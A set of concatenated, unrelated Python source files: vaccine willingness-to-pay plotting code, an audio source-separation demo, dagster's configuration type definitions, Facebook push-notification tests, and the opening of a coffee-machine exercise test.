        all_wtp["wtp_pc"] = all_wtp["agg_wtp"]/all_wtp["pop"]
        all_wtp["wtp_pc_usd"] = all_wtp["wtp_pc"] * USD
        all_wtp.sort_values(["_t", "wtp_pc_usd"], ascending = False, inplace = True)
        all_wtp.drop(columns = ["_t"], inplace = True)
        all_wtp.set_index("t", inplace = True)
        # cumulative population within each time step = doses needed to reach
        # each cell when vaccinating in ranked order
        all_wtp["num_vax"] = all_wtp["pop"].groupby(level = 0).cumsum()
        return all_wtp
    return ranking
# plotting functions
def outcomes_per_policy(percentiles, metric_label, fmt,
    phis = [25, 50, 100, 200],
    reference = (25, "no_vax"),
    reference_color = no_vax_color,
    vax_policies = ["contact", "random", "mortality"],
    policy_colors = [contactrate_vax_color, random_vax_color, mortality_vax_color],
    policy_labels = ["contact rate priority", "random assignment", "mortality priority"],
    spacing = 0.2):
    """Plot median + (lo, hi) spread of an outcome metric for each
    (phi, vaccination policy) combination, plus a no-vaccination reference.

    `percentiles` maps (phi, policy) keys — and the `reference` key — to
    (median, lo, hi) values.  (Default sequences are never mutated here.)
    """
    fig = plt.figure()
    # no-vaccination reference point at x = 0, with a dotted guide line
    md, lo, hi = percentiles[reference]
    *_, bars = plt.errorbar(x = [0], y = [md], yerr = [[md - lo], [hi - md]], figure = fig,
        fmt = fmt, color = reference_color, label = "no vaccination", ms = 12, elinewidth = 5)
    [_.set_alpha(0.5) for _ in bars]
    plt.hlines(md, xmin = -1, xmax = 5, linestyles = "dotted", colors = reference_color)
    for (i, phi) in enumerate(phis, start = 1):
        for (j, (vax_policy, color, label)) in enumerate(zip(vax_policies, policy_colors, policy_labels)):
            # FIX: look up the `percentiles` argument, not the global
            # `death_percentiles` (which made this function deaths-only
            # regardless of the metric passed in).
            md, lo, hi = percentiles[phi, vax_policy]
            *_, bars = plt.errorbar(
                x = [i + spacing * (j - 1)],
                y = [md], yerr = [[md - lo], [hi - md]],
                figure = fig,
                fmt = fmt,
                color = color,
                # FIX: attach legend labels on the first phi group; enumerate
                # starts at 1, so the original `i == 0` test never labeled
                # any policy series.
                label = label if i == 1 else None,
                ms = 12, elinewidth = 5
            )
            [_.set_alpha(0.5) for _ in bars]
    plt.legend(ncol = 4, fontsize = "20", loc = "lower center", bbox_to_anchor = (0.5, 1))
    plt.xticks(range(len(phis) + 1), [f"$\phi = {phi}$%" for phi in ([0] + phis)], fontsize = "20")
    plt.yticks(fontsize = "20")
    plt.PlotDevice().ylabel(f"{metric_label}\n")
    plt.gca().grid(False, axis = "x")
    ymin, ymax = plt.ylim()
    # vertical separators between phi groups
    plt.vlines(x = [0.5 + _ for _ in range(len(phis))], ymin = ymin, ymax = ymax, color = "gray", alpha = 0.5, linewidths = 2)
    plt.ylim(ymin, ymax)
    plt.xlim(-0.5, len(phis) + 1.5)
def plot_component_breakdowns(color, white, colorlabel, whitelabel, semilogy = False, ylabel = "WTP (USD)"):
    """Stacked bar chart over the 7 age bins: a filled component (`color`)
    with a white-faced component (`white`) stacked on top, both scaled to
    USD.  The two zero-height bars exist only to create legend entries."""
    fig, ax = plt.subplots()
    # white-faced segment stacked on top of the filled segment
    ax.bar(range(7), white * USD, bottom = color * USD, color = "white", edgecolor = age_group_colors, linewidth = 2, figure = fig)
    ax.bar(range(7), color * USD, color = age_group_colors, edgecolor = age_group_colors, linewidth = 2, figure = fig)
    # zero-height dummy bars: legend swatches for the two components
    ax.bar(range(7), [0], label = whitelabel, color = "white", edgecolor = "black", linewidth = 2)
    ax.bar(range(7), [0], label = colorlabel, color = "black", edgecolor = "black", linewidth = 2)
    plt.xticks(range(7), age_bin_labels, fontsize = "20")
    plt.yticks(fontsize = "20")
    plt.legend(ncol = 4, fontsize = "20", loc = "lower center", bbox_to_anchor = (0.5, 1))
    plt.PlotDevice().ylabel(f"{ylabel}\n")
    if semilogy: plt.semilogy()
def plot_district_age_distribution(percentiles, ylabel, fmt, phi = 50, vax_policy = "random", N_jk = None, n = 5, district_spacing = 1.5, age_spacing = 0.1, rotation = 0):
    """Errorbar plot of an age-binned metric for the first `n` districts.

    `percentiles[district, phi, vax_policy]` is indexed as rows
    (lo, median, hi) x 7 age bins.  If `N_jk` is given, values are divided
    by the bin population (per-capita); values are scaled to USD either way.
    """
    fig = plt.figure()
    district_ordering = list(districts_to_run.index)[:n]
    for (i, district) in enumerate(district_ordering):
        ylls = percentiles[district, phi, vax_policy]
        for j in range(7):
            # age bins plotted oldest-first (index 6-j), offset around the
            # district's x position
            plt.errorbar(
                x = [district_spacing * i + age_spacing * (j - 3)],
                y = ylls[1, 6-j] * USD/(N_jk[f"N_{6-j}"][district] if N_jk else 1),
                yerr = [
                    [(ylls[1, 6-j] - ylls[0, 6-j]) * USD/(N_jk[f"N_{6-j}"][district] if N_jk else 1)],
                    [(ylls[2, 6-j] - ylls[1, 6-j]) * USD/(N_jk[f"N_{6-j}"][district] if N_jk else 1)]
                ],
                fmt = fmt,
                color = age_group_colors[6-j],
                figure = fig,
                label = None if i > 0 else age_bin_labels[6-j],
                ms = 12, elinewidth = 5
            )
    plt.xticks(
        [1.5 * _ for _ in range(n)],
        district_ordering,
        rotation = rotation,
        fontsize = "20"
    )
    plt.yticks(fontsize = "20")
    plt.legend(title = "age bin", title_fontsize = "20", fontsize = "20", ncol = 7,
        loc = "lower center", bbox_to_anchor = (0.5, 1))
    ymin, ymax = plt.ylim()
    # vertical separators between districts
    plt.vlines(x = [0.75 + 1.5 * _ for _ in range(n-1)], ymin = ymin, ymax = ymax, color = "gray", alpha = 0.5, linewidths = 2)
    plt.ylim(ymin, ymax)
    plt.gca().grid(False, axis = "x")
    plt.PlotDevice().title(f"\n{vax_policy} demand curves").ylabel(f"{ylabel}\n")
def demand_curves(ranking_provider, vax_policy, phis = (25, 50, 100, 200), phi_benchmark = 25, N_state = N_TN):
    """Plot static (t = 0) and dynamic vaccine demand curves for ``vax_policy``.

    ranking_provider : callable (phi, vax_policy) -> per-day WTP ranking frame
        (as produced by get_wtp_ranking).
    phis : vaccination-rate scenarios to draw (percent of population, annually).
        Changed from a mutable default list to a tuple; it is only iterated.
    phi_benchmark : scenario used for the static benchmark step curve.
    N_state : state population used to scale daily doses (defaults to N_TN).

    NOTE(review): relies on module globals (percent, annually,
    simulation_range, USD, plt, np, chain) -- confirm they are in scope.
    """
    wtp_rankings = {phi: ranking_provider(phi, vax_policy) for phi in phis}
    figure = plt.figure()
    lines = []
    # benchmark: static allocation at t = 0, drawn as a step function by
    # duplicating each x/y pair
    benchmark = wtp_rankings[phi_benchmark]
    x_pop = list(chain(*zip(benchmark.loc[0]["num_vax"].shift(1).fillna(0), benchmark.loc[0]["num_vax"])))
    y_wtp = list(chain(*zip(benchmark.loc[0]["wtp_pc_usd"], benchmark.loc[0]["wtp_pc_usd"])))
    lines.append(plt.plot(x_pop, y_wtp, figure = figure, color = "black", linewidth = 2)[0])
    lines.append(plt.plot(0, 0, color = "white")[0])  # invisible spacer entry for the legend
    # plot dynamic curve
    for (phi, all_wtp) in wtp_rankings.items():
        daily_doses = phi * percent * annually * N_state
        distributed_doses = 0
        x_pop = []
        y_wtp = []
        t_vax = []
        ranking = 0
        for t in range(simulation_range):
            wtp = all_wtp.loc[t].reset_index()
            # lowest-ranked group whose cumulative allocation is not yet exhausted
            ranking = wtp[(wtp.index >= ranking) & (wtp.num_vax > distributed_doses)].index.min()
            if np.isnan(ranking):
                break
            x_pop += [distributed_doses, distributed_doses + daily_doses]
            t_vax += [t, t+1]
            y_wtp += [wtp.iloc[ranking].wtp_pc_usd]*2
            distributed_doses += daily_doses
        lines.append(
            # FIX: raw f-strings avoid the invalid "\p" escape-sequence warning
            # while emitting the exact same "$\phi$" TeX label bytes
            plt.plot(x_pop, y_wtp, label = rf"dynamic, {vax_policy}, $\phi = ${phi}%", figure = figure)[0]
        )
    plt.legend(
        lines,
        [rf"static, t = 0, $\phi = ${phi_benchmark}%", ""] + [rf"dynamic, {vax_policy}, $\phi = ${phi}%" for phi in phis],
        title = "allocation", title_fontsize = "24", fontsize = "20")
    plt.xticks(fontsize = "20")
    plt.yticks(fontsize = "20")
    plt.PlotDevice().ylabel("WTP (USD)\n").xlabel("\nnumber vaccinated")
    plt.ylim(0, 350)
    # NOTE(review): upper x-limit uses the global N_TN rather than the
    # N_state parameter -- confirm this is intended for non-default N_state.
    plt.xlim(left = 0, right = N_TN)
    plt.show()
if __name__ == "__main__":
    # Load pre-computed per-policy metrics (saved as .npz archives by the
    # upstream simulation run sized by num_sims).
    src = mkdir(data/f"wtp_metrics{num_sims}")
    evaluated_deaths = load_metrics(src/"evaluated_deaths.npz")
    evaluated_YLL = load_metrics(src/"evaluated_YLL.npz")
    evaluated_WTP = load_metrics(src/"evaluated_WTP.npz")
    evaluated_VSLY = load_metrics(src/"evaluated_VSLY.npz")
    evaluated_WTP_h = load_metrics(src/"evaluated_WTP_h.npz")
    evaluated_WTP_i = load_metrics(src/"evaluated_WTP_i.npz")
    evaluated_WTP_p = load_metrics(src/"evaluated_WTP_p.npz")
    evaluated_WTP_pc = load_metrics(src/"evaluated_WTP_pc.npz")
    district_WTP = load_metrics(src/"district_WTP.npz")
    district_YLL = load_metrics(src/"district_YLL.npz")
    # Collapse simulation draws to [50th, 5th, 95th] percentiles per policy tag.
    death_percentiles = {tag: np.percentile(metric, [50, 5, 95]) for (tag, metric) in evaluated_deaths.items()}
    YLL_percentiles = {tag: np.percentile(metric, [50, 5, 95]) for (tag, metric) in evaluated_YLL.items()}
    VSLY_percentiles = {tag: np.percentile(metric[0].sum(axis = 1), [50, 5, 95], axis = 0) for (tag, metric) in evaluated_VSLY.items()}
    WTP_percentiles = {tag: np.percentile(metric[0].sum(axis = 1), [50, 5, 95], axis = 0) for (tag, metric) in evaluated_WTP.items()}
    # policy outcomes
    # outcomes_per_policy(death_percentiles, "deaths", "o")
    # plt.show()
    # outcomes_per_policy(YLL_percentiles, "YLLs", "o")
    # plt.show()
    # outcomes_per_policy(WTP_percentiles, "WTP (USD, billions)", "D")
    # plt.show()
    # outcomes_per_policy(VSLY_percentiles, "VSLY (USD, billions)", "D")
    # # plt.gca().ticklabel_format(useOffset = False, style='plain')
    # plt.show()
    # # aggregate WTP by age
    # fig = plt.figure()
    # for (i, (md, lo, hi)) in enumerate(zip(*np.percentile(np.sum([v[0] for v in district_WTP.values()], axis = 0), [50, 5, 95], axis = 0))):
    #     *_, bars = plt.errorbar(x = [i], y = [md * USD], yerr = [[md * USD - lo * USD], [hi * USD - md * USD]], figure = fig,
    #         fmt = "D", color = age_group_colors[i], ms = 12, elinewidth = 5, label = age_bin_labels[i])
    #     [_.set_alpha(0.5) for _ in bars]
    # plt.xticks([0, 1, 2, 3, 4, 5, 6], age_bin_labels, fontsize = "20")
    # plt.yticks(fontsize = "20")
    # plt.legend(title = "age bin", title_fontsize = "20", fontsize = "20")
    # plt.PlotDevice().ylabel("aggregate WTP (USD)\n")
    # plt.show()
    # # health/consumption
    # Decompose median WTP into health vs consumption components.
    summed_wtp_health = np.median(evaluated_WTP_h[50, "random"], axis = 0)
    summed_wtp_income = np.median(evaluated_WTP_pc[50, "random"] - evaluated_WTP_h[50, "random"], axis = 0)
    # summed_wtp_income = np.median(evaluated_WTP_i[50, "random"], axis = 0)
    # plot_component_breakdowns(summed_wtp_health, summed_wtp_income, "health", "consumption", semilogy = True)
    # plt.show()
    # # social/private
    summed_wtp_priv = np.median(evaluated_WTP_p[50, "random"], axis = 0)
    summed_wtp_soc = np.median(evaluated_WTP_pc[50, "random"] - evaluated_WTP_p[50, "random"], axis = 0)
    # plot_component_breakdowns(summed_wtp_soc, summed_wtp_priv, "social", "private", semilogy = False)
    # plt.show()
    # # dist x age
    per_district_WTP_percentiles = {(district, *parse_tag(tag)): np.percentile(wtp[0, :, :], [50, 5, 95], axis = 0) for ((district, tag), wtp) in district_WTP.items()}
    per_district_YLL_percentiles = {(district, *parse_tag(tag)): np.percentile(yll , [50, 5, 95], axis = 0) for ((district, tag), yll) in district_YLL.items()}
    # plot_district_age_distribution(per_district_WTP_percentiles, "per capita WTP (USD)", "D", N_jk = N_jk_dicts)
    # plt.show()
    # plot_district_age_distribution(per_district_YLL_percentiles, "YLL" , "o")
    # plt.show()
    # demand curves
    ranking_provider = get_wtp_ranking(district_WTP)
    demand_curves(ranking_provider, "mortality")
    plt.show()
    demand_curves(ranking_provider, "random")
    plt.show()
    demand_curves(ranking_provider, "contact")
    plt.show()
|
<filename>demos/kam_harmonic_SS.py
# In this script a mixture of harmonic sources will be analyzed for separation using KAM
# along with harmonic kernels.
# NOTE(review): this is Python 2 code (print statement, time.clock, integer
# division for Ovp) -- it must be ported before running under Python 3.
# NOTE(review): original indentation was lost in extraction; loop extents
# below were reconstructed from the code's logic -- confirm against VCS.
import matplotlib.pyplot as plt
plt.interactive('True')
import numpy as np
from nussl.separation.KAM import AudioSignal,kam
import time
# close all figure windows
plt.close('all')
# load the audio mixture and generate spectrograms
FileName='/Users/fpishdadian/SourceSeparation/Audio Samples/Input/piano_mix2.wav'
mix=AudioSignal(FileName)
WinL=2*2048 # 93 ms window
Ovp=3*WinL/4 # 75% overlap (Python 2 integer division)
mix.windowlength=WinL
mix.overlap_samples=Ovp
mix.num_fft_bins=WinL
mix.makeplot=1
mix.fmaxplot=5000
plt.figure(1)
mix.do_STFT()
plt.title('Mixture')
# inputs of the 'kam' function
Inputfile=[FileName,'full length',0]
# define harmonic kernels with different fundamental freq.s
Np=1
SourceKernels=[]
SourceKernels.append(['harmonic',np.mat([24,Np])]) # source #1
SourceKernels.append(['harmonic',np.mat([32,Np])]) # source #2
SourceKernels.append(['harmonic',np.mat([36,Np])]) # source #3
SourceKernels.append(['harmonic',np.mat([40,Np])]) # source #4
# define smooth harmonic kernels with different fundamental freq.s
#SourceKernels=[]
#P=np.array([24,32,36,40])
#NP=1
#Df=NP*P+1
#def ismember(A, B):
#    return np.sum(np.array([ i == B.T for i in A.T ]),axis=1).T
#for i in range(0,4):
#    Nhood=lambda TFcoords1,TFcoords2: np.logical_and(np.logical_and((np.tile(TFcoords1[:,1],(1,TFcoords2.shape[0]))==np.tile(TFcoords2[:,1].T,(TFcoords1.shape[0],1))),\
#        (np.abs(np.tile(TFcoords1[:,0],(1,TFcoords2.shape[0]))-np.tile(TFcoords2[:,0].T,(TFcoords1.shape[0],1)))<Df[i])),\
#        (ismember(np.mod(np.tile(TFcoords1[:,0],(1,TFcoords2.shape[0]))-np.tile(TFcoords2[:,0].T,(TFcoords1.shape[0],1)),P[i]),np.mat([0,1,P[i]-1]))))
#    SourceKernels.append(['userdef',Nhood])
# STFT parameters handed to kam as a structured array
SpecParams=np.zeros(1,dtype=[('windowlength',int),('overlap_samples',int),('num_fft_bins',int)])
SpecParams['windowlength']=WinL
SpecParams['overlap_samples']=Ovp
SpecParams['num_fft_bins']=WinL
Numit=3
# call the kam function and record the running time
start_time = time.clock()
shat,fhat=kam(Inputfile,SourceKernels,Numit=Numit,SpecParams=SpecParams,FullKernel=False)[0:2]
print time.clock() - start_time, "seconds"
# write the separated sources to .wav files
Ns=len(SourceKernels)
OutPath='/Users/fpishdadian/SourceSeparation/Audio Samples/Output/'
for i in range(0,Ns):
    ssi=AudioSignal(audiosig=shat[:,:,i],fs=mix.fs)
    ssi.writeaudiofile(OutPath+'kamHout'+str(i+1)+'.wav')
# plot the separated time-domain signals and corresponding power spectral densities
ts=np.mat(np.arange(shat.shape[0])/float(mix.fs))
Fvec=mix.freq_vec
Tvec=mix.time_vec[0:fhat.shape[1]]
TT=np.tile(Tvec,(len(Fvec),1))
FF=np.tile(Fvec.T,(len(Tvec),1)).T
plt.figure(2)
for i in range(0,Ns):
    plt.subplot(Ns,1,i+1)
    #plt.plot(ts.T,src1.x[0:shat.shape[0]])
    plt.plot(ts.T,shat[:,0,i])
    plt.ylabel(r'$\hat{s}_'+str(i+1)+'(t)$')
    plt.axis('tight')
plt.xlabel('t(s)')
plt.figure(3)
for i in range(0,Ns):
    plt.subplot(Ns,1,i+1)
    plt.pcolormesh(TT,FF,np.log10(fhat[:,:,i]))
    plt.ylabel('f(Hz)')
    plt.title(r'$\hat{f}_'+str(i+1)+' $')
    plt.axis('tight')
    #plt.ylim(src1.freq_vec[0],5000)
plt.xlabel('t(s)')
|
<filename>python_modules/dagster/dagster/core/types/config.py
from collections import namedtuple
import six
from dagster import check
from .builtin_enum import BuiltinEnum
class ConfigTypeAttributes(namedtuple('_ConfigTypeAttributes', 'is_builtin is_system_config')):
    '''Immutable pair of provenance flags carried by every ConfigType.'''

    def __new__(cls, is_builtin=False, is_system_config=False):
        validated_builtin = check.bool_param(is_builtin, 'is_builtin')
        validated_system = check.bool_param(is_system_config, 'is_system_config')
        return super(ConfigTypeAttributes, cls).__new__(cls, validated_builtin, validated_system)


DEFAULT_TYPE_ATTRIBUTES = ConfigTypeAttributes()
class ConfigType(object):
    '''
    The class backing DagsterTypes as they are used processing configuration data.
    '''

    def __init__(self, key, name, type_attributes=DEFAULT_TYPE_ATTRIBUTES, description=None):
        # Guard against direct construction: instances must be obtained via
        # inst(), which memoizes exactly one instance per concrete class.
        type_obj = type(self)
        if type_obj in ConfigType.__cache:
            check.failed(
                (
                    '{type_obj} already in cache. You **must** use the inst() class method '
                    'to construct ConfigTypes and not the ctor'.format(type_obj=type_obj)
                )
            )
        self.key = check.str_param(key, 'key')
        # name may be None for synthesized types (see the List/Nullable factories)
        self.name = check.opt_str_param(name, 'name')
        self.description = check.opt_str_param(description, 'description')
        self.type_attributes = check.inst_param(
            type_attributes, 'type_attributes', ConfigTypeAttributes
        )

    # Per-concrete-class singleton cache (name-mangled to _ConfigType__cache).
    __cache = {}

    @classmethod
    def inst(cls):
        '''Return the memoized singleton instance of this concrete type.'''
        if cls not in ConfigType.__cache:
            ConfigType.__cache[cls] = cls()  # pylint: disable=E1120
        return ConfigType.__cache[cls]

    @staticmethod
    def from_builtin_enum(builtin_enum):
        '''Map a BuiltinEnum member to its singleton ConfigType instance.'''
        check.invariant(BuiltinEnum.contains(builtin_enum), 'param must be member of BuiltinEnum')
        return _CONFIG_MAP[builtin_enum]

    @property
    def is_system_config(self):
        return self.type_attributes.is_system_config

    @property
    def is_builtin(self):
        return self.type_attributes.is_builtin

    @property
    def has_fields(self):
        # True for types with named fields (composites and selectors).
        return self.is_composite or self.is_selector

    # The is_* flags below default to False; each subclass overrides the one
    # that applies to it.
    @property
    def is_scalar(self):
        return False

    @property
    def is_list(self):
        return False

    @property
    def is_nullable(self):
        return False

    @property
    def is_composite(self):
        return False

    @property
    def is_selector(self):
        return False

    @property
    def is_any(self):
        return False

    @property
    def inner_types(self):
        # Leaf types wrap nothing; wrapper types (List/Nullable) override.
        return []

    @property
    def is_enum(self):
        return False
# Scalars, Composites, Selectors, Lists, Optional, Any
class ConfigScalar(ConfigType):
    '''Abstract base for scalar config types; subclasses must implement
    is_config_scalar_valid.'''

    @property
    def is_scalar(self):
        return True

    def is_config_scalar_valid(self, _config_value):
        # Abstract hook: concrete scalar types must override.
        check.not_implemented('must implement')
class ConfigList(ConfigType):
    '''Config type describing a homogeneous list of ``inner_type`` values.'''

    def __init__(self, inner_type, *args, **kwargs):
        # Validate the wrapped type before delegating the rest upward.
        self.inner_type = check.inst_param(inner_type, 'inner_type', ConfigType)
        super(ConfigList, self).__init__(*args, **kwargs)

    @property
    def is_list(self):
        # BUG FIX: the base class exposes is_list as a *property*; without
        # @property this override returned a bound method, so attribute
        # access (config_type.is_list) was always truthy for every type
        # checked against a ConfigList instance.
        return True

    @property
    def inner_types(self):
        # The direct inner type followed by its own (recursive) inner types.
        return [self.inner_type] + self.inner_type.inner_types
class ConfigNullable(ConfigType):
    '''Config type whose value may also be None, wrapping ``inner_type``.'''

    def __init__(self, inner_type, *args, **kwargs):
        self.inner_type = check.inst_param(inner_type, 'inner_type', ConfigType)
        super(ConfigNullable, self).__init__(*args, **kwargs)

    @property
    def is_nullable(self):
        return True

    @property
    def inner_types(self):
        # The direct inner type followed by its own (recursive) inner types.
        nested = [self.inner_type]
        nested.extend(self.inner_type.inner_types)
        return nested
class ConfigAny(ConfigType):
    '''Config type that accepts any configuration value.'''

    @property
    def is_any(self):
        return True
class BuiltinConfigScalar(ConfigScalar):
    '''Base for the builtin scalar types; key and name both derive from the
    concrete class name.'''

    def __init__(self, description=None):
        cls_name = type(self).__name__
        super(BuiltinConfigScalar, self).__init__(
            key=cls_name,
            name=cls_name,
            description=description,
            type_attributes=ConfigTypeAttributes(is_builtin=True),
        )
class Int(BuiltinConfigScalar):
    '''Builtin integer scalar config type.'''

    def __init__(self):
        super(Int, self).__init__(description='')

    def is_config_scalar_valid(self, config_value):
        # bool is a subclass of int in Python, so reject it explicitly first.
        if isinstance(config_value, bool):
            return False
        return isinstance(config_value, six.integer_types)
class _StringishBuiltin(BuiltinConfigScalar):
    '''Shared validation for builtins represented as strings (String, Path).'''

    def is_config_scalar_valid(self, config_value):
        return isinstance(config_value, six.string_types)
class String(_StringishBuiltin):
    '''Builtin string scalar config type.'''

    def __init__(self):
        super(String, self).__init__(description='')
class Path(_StringishBuiltin):
    '''Builtin filesystem-path scalar config type (validated as a string).'''

    def __init__(self):
        super(Path, self).__init__(description='')
class Bool(BuiltinConfigScalar):
    '''Builtin boolean scalar config type.'''

    def __init__(self):
        super(Bool, self).__init__(description='')

    def is_config_scalar_valid(self, config_value):
        return isinstance(config_value, bool)
class Float(BuiltinConfigScalar):
    '''Builtin float scalar config type.'''

    def __init__(self):
        super(Float, self).__init__(description='')

    def is_config_scalar_valid(self, config_value):
        # NOTE(review): integer config values are rejected here (no implicit
        # int -> float coercion) -- confirm this is the intended contract.
        return isinstance(config_value, float)
class Any(ConfigAny):
    '''Builtin Any type (key and name are both "Any").'''

    def __init__(self):
        super(Any, self).__init__(
            key='Any', name='Any', type_attributes=ConfigTypeAttributes(is_builtin=True)
        )
def Nullable(inner_type):
    '''Factory: return a ConfigNullable subclass wrapping ``inner_type``.

    The returned *class* (not instance) is keyed "Optional.<inner key>" and is
    expected to be instantiated through ConfigType.inst().
    '''
    check.inst_param(inner_type, 'inner_type', ConfigType)

    class _Nullable(ConfigNullable):
        def __init__(self):
            super(_Nullable, self).__init__(
                key='Optional.{inner_type}'.format(inner_type=inner_type.key),
                name=None,
                type_attributes=ConfigTypeAttributes(is_builtin=True),
                inner_type=inner_type,
            )

    return _Nullable
def List(inner_type):
    '''Factory: return a ConfigList subclass describing a list of
    ``inner_type`` values, keyed "List.<inner key>".'''
    check.inst_param(inner_type, 'inner_type', ConfigType)

    class _List(ConfigList):
        def __init__(self):
            # Avoiding a very nasty circular dependency which would require us to restructure the
            # entire module
            from .type_printer import print_config_type_to_string
            super(_List, self).__init__(
                key='List.{inner_type}'.format(inner_type=inner_type.key),
                name=None,
                type_attributes=ConfigTypeAttributes(is_builtin=True),
                inner_type=inner_type,
            )
            # Human-readable description derived from the printed type.
            self.description = 'List of {inner_type}'.format(
                inner_type=print_config_type_to_string(self, with_lines=False)
            )

    return _List
class EnumValue(object):
    '''One member of a ConfigEnum: the user-facing config value, the value
    handed to python code, and an optional description.

    CONSISTENCY FIX: inherit from object explicitly. This module supports
    Python 2 (it uses six), where a bare ``class EnumValue:`` is an old-style
    class; every other class here is new-style.
    '''

    def __init__(self, config_value, python_value=None, description=None):
        self.config_value = check.str_param(config_value, 'config_value')
        # The python-facing value defaults to the config value itself.
        self.python_value = config_value if python_value is None else python_value
        self.description = check.opt_str_param(description, 'description')
class ConfigEnum(ConfigType):
    '''Config type whose values are drawn from a fixed set of EnumValues.'''

    def __init__(self, name, enum_values):
        check.str_param(name, 'name')
        super(ConfigEnum, self).__init__(key=name, name=name)
        self.enum_values = check.list_param(enum_values, 'enum_values', of_type=EnumValue)
        # Both the config-facing and python-facing values must be unique.
        self._valid_python_values = {ev.python_value for ev in enum_values}
        check.invariant(len(self._valid_python_values) == len(enum_values))
        self._valid_config_values = {ev.config_value for ev in enum_values}
        check.invariant(len(self._valid_config_values) == len(enum_values))

    @property
    def config_values(self):
        return [ev.config_value for ev in self.enum_values]

    @property
    def is_enum(self):
        return True

    def is_valid_config_enum_value(self, config_value):
        return config_value in self._valid_config_values

    def to_python_value(self, config_value):
        '''Translate a pre-validated config value into its python value.'''
        for ev in self.enum_values:
            if ev.config_value == config_value:
                return ev.python_value
        # Unreachable when callers validate first (see is_valid_config_enum_value).
        check.failed('should never reach this. config_value should be pre-validated')
def Enum(name, enum_values):
    '''Factory: return a ConfigEnum subclass bound to ``name`` and
    ``enum_values``, suitable for instantiation via ConfigType.inst().'''
    class _EnumType(ConfigEnum):
        def __init__(self):
            super(_EnumType, self).__init__(name=name, enum_values=enum_values)

    return _EnumType
# Singleton instance for each builtin, keyed by its language-level BuiltinEnum.
_CONFIG_MAP = {
    BuiltinEnum.ANY: Any.inst(),
    BuiltinEnum.BOOL: Bool.inst(),
    BuiltinEnum.FLOAT: Float.inst(),
    BuiltinEnum.INT: Int.inst(),
    BuiltinEnum.PATH: Path.inst(),
    BuiltinEnum.STRING: String.inst(),
}

# Convenience set for membership tests against the builtin config types.
ALL_CONFIG_BUILTINS = set(_CONFIG_MAP.values())
|
# coding: utf-8
from zeit.cms.workflow.interfaces import IPublish, IPublishInfo
from zeit.cms.testcontenttype.testcontenttype import ExampleContentType
import fb
import os
import time
import unittest
import zeit.push.facebook
import zeit.push.interfaces
import zeit.push.testing
import zope.component
class FacebookTest(zeit.push.testing.TestCase):
    '''Integration tests that talk to the live Facebook Graph API.'''

    # NOTE(review): presumably a zope.testrunner test level so these live-API
    # tests are excluded from the default fast run -- confirm.
    level = 2

    def setUp(self):
        # Page access token for
        # <https://www.facebook.com/pages/Vivi-Test/721128357931123>,
        # created on 2014-07-16, expires in about 60 days, recreate with
        # ./work/maintenancejobs/bin/facebook-access-token
        self.access_token = os.environ['ZEIT_PUSH_FACEBOOK_ACCESS_TOKEN']
        self.api = fb.graph.api(self.access_token)
        # repr keeps all digits while str would cut them.
        # Unique per-run marker used to find our own posts in the feed.
        self.nugget = repr(time.time())

    # Only relevant for the skipped test
    # def tearDown(self):
    #     for status in self.api.get_object(
    #             cat='single', id='me', fields=['feed'])['feed']['data']:
    #         if 'message' in status and self.nugget in status['message']:
    #             self.api.delete(id=status['id'])

    @unittest.skip('Facebook says the content was reported as abusive')
    def test_send_posts_status(self):
        facebook = zeit.push.facebook.Connection()
        facebook.send(
            u'zeit.push.tests.faceboök %s' % self.nugget, 'http://example.com',
            account='fb-test')
        for status in self.api.get_object(
                cat='single', id='me', fields=['feed'])['feed']['data']:
            if self.nugget in status['message']:
                self.assertStartsWith('http://example.com/', status['link'])
                self.assertIn(u'faceboök', status['message'])
                break
        else:
            # for/else: only reached when no matching status was found
            self.fail('Status was not posted')

    def test_errors_should_raise(self):
        facebook = zeit.push.facebook.Connection()
        with self.assertRaises(zeit.push.interfaces.TechnicalError) as e:
            facebook.send('foo', '', account='fb_ressort_deutschland')
        self.assertIn('Invalid OAuth access token.', str(e.exception))
class FacebookAccountsTest(zeit.push.testing.TestCase):
    '''The account source must list all accounts except the main one.'''

    def test_main_account_is_excluded_from_source(self):
        accounts = list(zeit.push.interfaces.facebookAccountSource(None))
        self.assertEqual(['fb-magazin', 'fb-campus'], accounts)
class FacebookMessageTest(zeit.push.testing.TestCase):
    '''Behaviour of the "facebook" IMessage adapter.'''

    def test_uses_facebook_override_text(self):
        content = ExampleContentType()
        self.repository['foo'] = content
        push = zeit.push.interfaces.IPushMessages(content)
        push.message_config = [{
            'type': 'facebook', 'enabled': True, 'account': 'fb-test',
            'override_text': 'facebook'}]
        message = zope.component.getAdapter(
            content, zeit.push.interfaces.IMessage, name='facebook')
        # XXX This API is a bit unwieldy
        # (see zeit.push.workflow.PushMessages._create_message)
        message.config = push.message_config[0]
        self.assertEqual('facebook', message.text)

    def test_adds_campaign_parameters_to_url(self):
        content = self.repository['testcontent']
        message = zope.component.getAdapter(
            content, zeit.push.interfaces.IMessage, name='facebook')
        self.assertIn('wt_zmc=sm.int.zonaudev.facebook', message.url)

    def test_breaking_flag_is_removed_from_service_after_send(self):
        content = ExampleContentType()
        self.repository['foo'] = content
        push = zeit.push.interfaces.IPushMessages(content)
        push.message_config = ({
            'type': 'facebook', 'enabled': True, 'breaking_news': True,
            'override_text': 'facebook'},)
        IPublishInfo(content).urgent = True
        IPublish(content).publish()
        # After publishing, the message must be disabled and the
        # breaking_news flag cleared so it is not re-sent.
        self.assertEqual(
            ({'type': 'facebook', 'enabled': False, 'breaking_news': False,
            'override_text': 'facebook'},),
            push.message_config)
|
from hstest.stage_test import *
from hstest.test_case import TestCase
# Re-bind hstest's CheckResult constructors to the simple two-argument form
# used by CoffeeMachineTest.check below.
CheckResult.correct = lambda: CheckResult(True, '')
CheckResult.wrong = lambda feedback: CheckResult(False, feedback)

# Scripted stdin interactions for the coffee machine under test.
# test1: the example scenario -- buy twice, refill, buy again, take the money.
test1_input = '''remaining
buy
2
buy
2
fill
1000
0
0
0
buy
2
take
remaining
exit
'''

# test2: "fill" only.
test2_input = '''remaining
fill
3000
3000
3000
3000
remaining
exit
'''

# test3-test5: "buy" with each of the three coffee variants.
test3_input = '''remaining
buy
1
remaining
exit
'''

test4_input = '''remaining
buy
2
remaining
exit
'''

test5_input = '''remaining
buy
3
remaining
exit
'''

# test6: "take" empties the cash box.
test6_input = '''remaining
take
remaining
exit
'''

# test7: "back" right after "buy" must change nothing.
test7_input = '''remaining
buy
back
remaining
exit
'''
class CoffeeMachineTest(StageTest):

    def generate(self) -> List[TestCase]:
        """Build the Stepik test cases.

        Each clue tuple holds the expected deltas (second "remaining" report
        minus the first) in the order unpacked by check():
        water, milk, beans, cups, money, followed by the feedback string.
        """
